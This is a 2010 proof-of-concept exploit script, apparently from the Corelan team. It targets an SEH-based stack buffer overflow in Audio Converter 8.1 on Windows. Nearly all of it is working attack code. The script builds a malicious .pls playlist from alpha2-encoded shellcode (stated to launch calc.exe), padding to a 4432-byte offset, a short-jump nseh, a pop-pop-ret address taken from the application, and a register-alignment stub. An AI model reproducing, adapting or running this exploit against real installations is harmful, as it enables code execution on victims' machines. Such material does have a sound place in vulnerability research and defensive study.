#*********************************************************************************** # Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit # Date : 16/05/2010 # Author : Sud0 # Bug found by : chap0 # Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html # Version : 8.1 # OS : Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln : SEH # Thanks to my wife for her support # Thanks for chap0 for bringing us the game # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. #*********************************************************************************** #code : print "|------------------------------------------------------------------|\n"; print "| __ __ |\n"; print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n"; print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n"; print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n"; print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n"; print "| |\n"; print "| http://www.corelan.be:8800 |\n"; print "| |\n"; print "|-------------------------------------------------[ EIP Hunters ]--|\n\n"; print "[+] Exploit for .... \n"; import socket #shellcode running calc.exe alpha2 encoded basereg edx shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA" junk="B" * (4432 - len(shell)) #seh overwritten after 4432 bytes nseh= "\xEB\x06\xEB\x06" # jmp forward seh= "\xF1\x8E\x03\x10" # nice ppr from audioconv align="\x61\x61\x61\xff\xE2" # popad / popad / popad / jmp edx buffer= shell + junk + nseh + seh + "\x90" * 20 + align + "A"* 10000# added some nops after seh mefile = open('poc.pls','w'); mefile.write(buffer); mefile.close()